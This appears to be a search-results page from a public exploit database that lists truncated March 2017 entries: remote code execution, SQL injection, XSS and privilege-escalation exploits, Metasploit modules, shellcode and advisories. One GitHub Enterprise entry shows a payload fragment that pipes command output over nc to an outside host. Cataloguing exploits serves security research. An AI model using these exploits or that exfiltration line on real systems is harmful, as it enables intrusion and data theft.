47904 matches found
GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution
!/usr/bin/ruby require "openssl" require "cgi" require "net/http" require "uri" SECRET = "641dd6454584ddabfed6342cc66281fb" puts ' . . ' puts ' \ | | | ' puts '/ \\ / /\ \ | | | | | / \ ' puts '\ / /\ \ / /// \ ' puts ' / / / / / ' puts '' puts "github Enterprise RCE exploit" puts...
Microsoft Windows - 'LoadUvsTable()' Heap Buffer Overflow
Date: 15-03-2017 Author: Hossein Lotfi https://twitter.com/hosselot CVE: CVE-2016-7274 1. Description An integer overflow error within the "LoadUvsTable" function of usp10.dll can be exploited to cause a heap-based buffer overflow. Full analysis is available at:...
Sitecore CMS 8.1 Update-3 - Cross-Site Scripting
Exploit Title: Stored Cross Site Scripting XSS in Sitecore Experience Platform 8.1 Update-3 Date: March 15, 2017 Exploit Author: Pralhad Chaskar Vendor Homepage: http://www.sitecore.net/en Version: 8.1 rev. 160519 Tested on: Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519 CVE :...
Adobe Flash - AVC Header Slicing Heap Overflow
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1017 There is a heap overflow in AVC header slicing. To reproduce the issue, put the attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=slice.flv Proof of Concept:...
Adobe Flash - ATF Planar Decompression Heap Overflow
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1016 The attached file causes heap corruption when decompressing a planar block. To reproduce the issue, but both attached files on a server and visit: http://127.0.0.1/LoadImage.swf?img=planar1.atf Proof of Concept:...
Adobe Flash - MovieClip Attach init Object Use-After-Free
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1006 The attached file causes a use-after-free in attaching a MovieClip and applying the init object. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41609.zip...
Adobe Flash - Metadata Parsing Out-of-Bounds Read
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1005 The attached file causes an out-of-bounds read when its metadata is parsed Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41608.zip...
IBM WebSphere - RCE Java Deserialization (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "IBM WebSphere RCE Java Deserialization Vulnerability", 'Description' = %q This module exploits a vulnerability in IBM's WebSphe...
Adobe Flash - ATF Thumbnailing Heap Overflow
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1015 The attached file causes an overflow in heap thumbnailing. To reproduce, place both attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=thumb2.atf Proof of Concept:...
Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1021 Windows: COM Session Moniker EoP Platform: Tested on Windows 10 14393, Server 2012 R2 Class: Elevation of Privilege Summary: When activating an object using the session moniker the DCOM activator doesn’t check if the current...
Joomla! Component Vik Rent Items 1.3 - SQL Injection
Exploit Title: Joomla! Component Vik Rent Items v1.3 - SQL Injection Google Dork: inurl:index.php?option=comvikrentitems Date: 15.03.2017 Vendor Homepage: https://extensionsforjoomla.com/ Software : https://extensionsforjoomla.com/components-modules/vik-rent-items-e4j Demo:...
Joomla! Component Vik Rent Car 1.11 - SQL Injection
Exploit Title: Joomla! Component Vik Rent Car v1.11 - SQL Injection Google Dork: inurl:index.php?option=comvikrentcar Date: 15.03.2017 Vendor Homepage: https://extensionsforjoomla.com/ Software : https://extensionsforjoomla.com/components-modules/vik-rent-car-e4j Demo:...
Joomla! Component Vik Appointments 1.5 - SQL Injection
Exploit Title: Joomla! Component Vik Appointments v1.5 - SQL Injection Google Dork: inurl:index.php?option=comvikappointments Date: 15.03.2017 Vendor Homepage: https://extensionsforjoomla.com/ Software : https://extensionsforjoomla.com/livedemo/vikappointments/ Demo:...
PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation
Exploit Title: PCAUSA Rawether for Windows local privilege escalation Date: 2017-03-15 Exploit Author: ReWolf Vendor Homepage: original vendor website doesn't exist anymore Version: too many Tested on: Windows 10 x64 TH2, RS1 Rawether for Windows is a framework that facilitates communication...
GitHub Enterprise < 2.8.7 - Remote Code Execution
!/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "id | nc orange.tw 12345" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07" + ":\x09@src" + Marshal.dumpcode2..-1 +...
Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule 'Apache Struts Jakarta Multipart Parser OGNL Injection', 'Description' = %q This module exploits a remote code execution...
Joomla! Component Advertisement Board 3.0.4 - 'id' SQL Injection
Exploit Title: Joomla! Component Advertisement Board v3.0.4 - SQL Injection Google Dork: inurl:index.php?option=comadvertisementboard Date: 14.03.2017 Vendor Homepage: http://ordasoft.com/ Software :...
Joomla! Component Simple Membership 3.3.3 - 'userId' SQL Injection
Exploit Title: Joomla! Component Simple Membership v3.3.3 - SQL Injection Google Dork: inurl:index.php?option=comsimplemembership Date: 14.03.2017 Vendor Homepage: http://ordasoft.com/ Software :...
APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow
Exploit Title: APNGDis chunk size descriptor Buffer Overflow Date: 14-03-2017 Exploit Author: Alwin Peppels Vendor Homepage: http://apngdis.sourceforge.net/ Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ Version: 2.8 Tested on: Linux Debian / Windows 7 CVE : CVE-2017-6192...
APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow
Exploit Title: APNGDis image width / height Buffer Overflow Date: 14-03-2017 Exploit Author: Alwin Peppels Vendor Homepage: http://apngdis.sourceforge.net/ Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ Version: 2.8 Tested on: Linux Debian / Windows 7 CVE : CVE-2017-6193...
APNGDis 2.8 - 'filename' Stack Buffer Overflow (PoC)
Exploit Title: APNGDis filename Buffer Overflow Date: 14-03-2017 Exploit Author: Alwin Peppels Vendor Homepage: http://apngdis.sourceforge.net/ Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ Version: 2.8 Tested on: Linux Debian / Windows 7 CVE : CVE-2017-6191 Additional...
Steam Profile Integration 2.0.11 - SQL injection
Exploit Title: IPS Community Suite - Steam Profile Integration 2.0.11 and below SQL injection Google Dork: inurl:tab=nodesteamsteamprofile Date: 13/03/2017 Exploit Author: DrWhat Vendor Homepage: https://invisionpower.com/files/file/8170-steam-profile-integration/ Software Link:...
Netgear R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "Netgear R7000 and R6400 cgi-bin Command Injection", 'Description' = %q This module exploits an arbitrary command injection...
Car Workshop System - SQL Injection
Exploit Title: Car Workshop System - SQL Injection Google Dork: N/A Date: 13.03.2017 Vendor Homepage: http://prosoft-apps.com/ Software: https://codecanyon.net/item/car-workshop-system/19562074 Demo: http://workshop.prosoft-apps.com/ Version: N/A Tested on: Win7 x64, Kali Linux x64 Exploit Author...
Cerberus FTP Server 8.0.10.1 - Denial of Service
Exploit Title: Cerberus FTP server – Denial of Service Date: 2017-03-13 Exploit Author: Peter Baris Vendor Homepage: https://www.cerberusftp.com/ Software Link: download link if available Version: 8.0.10.1 Tested on: Windows Server 2008 R2 Standard x64, Windows 7 Pro SP1 x64 CVE : CVE-2017-6367...
Oracle VM VirtualBox - Cooperating VMs can Escape from Shared Folder
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1037 There is a security issue in the shared folder implementation that permits cooperating guests with write access to the same shared folder to gain access to the whole filesystem of the host, at least on Linux hosts. The issue i...
Easy MOV Converter 1.4.24 - Local Buffer Overflow (SEH)
!/usr/bin/python Exploit Title : Easy MOV Converter - 'Enter User Name' Field SEH Overwrite POC Date : 12/03/2017 Exploit Author : Muhann4d Vendor Homepage : http://www.divxtodvd.net/ Software Link : http://www.divxtodvd.net/easymovconverter.exe Tested Version : 1.4.24 Category : Denial of Servic...
Nintendo Switch - WebKit Code Execution (PoC)
CVE-2016-4657 Switch PoC body font-size: 2em; a text-decoration: none; color: 000; a:hover color: f00; font-weight: bold; CVE-2016-4657 Nintendo Switch PoC go! reload waiting... click go. // display JS errors as alerts. Helps debugging. window.onerror = functionerror, url, line alerterror+'...
Windows x86 - Hide Console Window Shellcode (182 bytes)
Windows x86 - Hide Console Window Shellcode 182 bytes. Shellcode exploit for Winx86 platform / MIT License Copyright c 2017 Ege Balcı Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files the "Software", to deal in the...
Fiyo CMS 2.0.6.1 - Privilege Escalation
Exploit Title: Fiyo CMS 2.0.6.1 allows remote authenticated users to gain privileges via a modified level parameter Google Dork: no Date: 11-03-2017 Exploit Author: @runggareksya, @dvnrcy Vendor Homepage: http://www.fiyo.org Software Link: https://sourceforge.net/projects/fiyo-cms Version: 2.0.6....
Yellow Pages Script 3.2 - 'category_id' SQL Injection
Exploit Title: Yellow Pages Script v3.2 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/yellow-pages-script/ Demo: http://demo.phpjabbers.com/index.php?demo=yps&front=1&lid=1 Version: 3.2 Tested on: Win7 x64, Kali...
MobaXterm Personal Edition 9.4 - Directory Traversal
Credits: John Page AKA hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt + ISR: ApparitionSec Vendor: ===================== mobaxterm.mobatek.net Product: ===============================...
Mirage - SQL Injection
Exploit Title: Mirage – Fancy Clone - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.zoplay.com/ Software: https://www.zoplay.com/web/multi-vendor-clone-website/ Demo: http://fancyclone.zoplay.com/ Version: N/A Tested on: Win7 x64, Kali Linux x64 Exploit Author: Ihsa...
Travel Tours Script 2.0 - SQL Injection
Exploit Title: Travel Tours Script v2.0 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/travel-tours-script/ Demo: http://demo.phpjabbers.com/index.php?demo=vpl&front=1&lid=1 Version: 2.0 Tested on: Win7 x64, Kali...
PHP Forum Script 3.0 - SQL Injection
Exploit Title: PHP Forum Script v3.0 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/php-forum-script/ Demo: http://demo.phpjabbers.com/index.php?demo=pfs&front=1&lid=1 Version: 3.0 Tested on: Win7 x64, Kali Linux...
Property Listing Script 3.1 - SQL Injection
Exploit Title: Property Listing Script v3.1 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/property-listing-script/ Demo: http://demo.phpjabbers.com/index.php?demo=pls&front=1&lid=1 Version: 3.1 Tested on: Win7...
Vanelo - SQL Injection
Exploit Title: Vanelo – Wanelo Clone - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.zoplay.com/ Software: https://www.zoplay.com/web/trending-marketplace-website/ Demo: http://wanelo.zoplay.com/ Version: N/A Tested on: Win7 x64, Kali Linux x64 Exploit Author: Ihsan...
Global In - SQL Injection
Exploit Title: Global In – A LinkedIn Clone - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.techbizstudio.com/ Software: https://www.techbizstudio.com/product/linkedin-clone/ Demo: https://www.techbizstudio.com/demo/globalin/ Version: N/A Tested on: Win7 x64, Kali...
Domain Marketplace Script - SQL Injection
Exploit Title: Domain Marketplace Script - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: http://scripteen.com/ Software: http://scripteen.com/item/scripts/scripteen-domain-marketplace-script.html Demo: http://dwm.domainauctionsscript.com/ Version: N/A Tested on: Win7 x64, Kali...
Pet Listing Script 3.0 - SQL Injection
Exploit Title: Pet Listing Script v3.0 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/pet-listing-script/ Demo: http://demo.phpjabbers.com/index.php?demo=petls&front=1&lid=1 Version: 3.0 Tested on: Win7 x64, Kali...
Global In - Arbitrary File Upload
Exploit Title: Global In - Arbitrary File Upload Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.techbizstudio.com/ Software: https://www.techbizstudio.com/product/linkedin-clone/ Demo: https://www.techbizstudio.com/demo/globalin/ Version: N/A Tested on: Win7 x64, Kali Linux x64...
Yacht Listing Script 2.0 - SQL Injection
Exploit Title: Yacht Listing Script v2.0 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/yacht-listing-script/ Demo: http://demo.phpjabbers.com/index.php?demo=yls&front=1&lid=1 Version: 2.0 Tested on: Win7 x64, Ka...
Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation
/ Check these out: - https://www.coresecurity.com/system/files/publications/2016/05/Windows%20SMEP%20bypass%20U%3DS.pdf - https://labs.mwrinfosecurity.com/blog/a-tale-of-bitmaps/ Tested on: - Windows 10 Pro x86 1703/1709 - ntoskrnl.exe: 10.0.16299.309 - FortiShield.sys: 5.2.3.633 Compile: -...
Price Comparison Script 2017.1.8 - SQL Injection
Price Comparison Script 2017.1.8 - SQL Injection. Webapps exploit for PHP platform Exploit Title: Price Comparison Script v2017.1.8 - SQL Injection Google Dork: N/A Date: 10.03.2017 Vendor Homepage: https://www.axisitp.com/ Software: https://www.axisitp.com/price-comparison-script.php Demo:...
Clickbank Affiliate Marketplace Script 2017 - SQL Injection
Clickbank Affiliate Marketplace Script 2017 - SQL Injection. Webapps exploit for PHP platform Exploit Title: Clickbank Affiliate Marketplace Script v2017 - SQL Injection Google Dork: N/A Date: 10.03.2017 Vendor Homepage: https://www.axisitp.com/ Software:...
dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting
Title: Multiple vulnerabilities discovered in dnaLIMS DNA sequencing web-application Advisory URL: https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/ Date published: Mar 08, 2017 Vendor: dnaTools, Inc. CVE IDs: 2017-6526, 2017-6527, 2017-6528, 2017-6529 USCERT VU:...
WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery
!-- KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery Title: WatchGuard XTMv User Management Cross-Site Request Forgery Advisory ID: KL-001-2017-004 Publication Date: 2017.03.10 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt 1...
Kinsey Infor/Lawson / ESBUS - SQL Injection
Exploit Title: Kinsey Infor / Lawson ESBUS - Multiple SQL Injections Date: 3/10/2017 Exploit Author: Michael Benich Vendor homepage: http://www.kinsey.com/infor-lawson.html Version: ALL Tested on: Windows Server 2008 R2; MySQL ver 5.5 CVE: CVE-2017-6550 Kinsey's Infor-Lawson application formerly...
FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery
!-- + Credits: John Page AKA hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/FTP-VOYAGER-SCHEDULER-CSRF-REMOTE-CMD-EXECUTION.txt + ISR: ApparitionSec Vendor: ============== solarwinds.com www.serv-u.com Product: ==================== FTP Voyager...
Soundify 1.1 - 'tid' SQL Injection
Exploit Title: Soundify - Audio Sharing Software v1.1 - SQL Injection Google Dork: N/A Date: 09.03.2017 Vendor Homepage: https://www.ncrypted.net/ Software: https://www.ncrypted.net/soundify Demo: http://demo.ncryptedprojects.com/soundify/ Version: N/A Tested on: Win7 x64, Kali Linux x64 Exploit...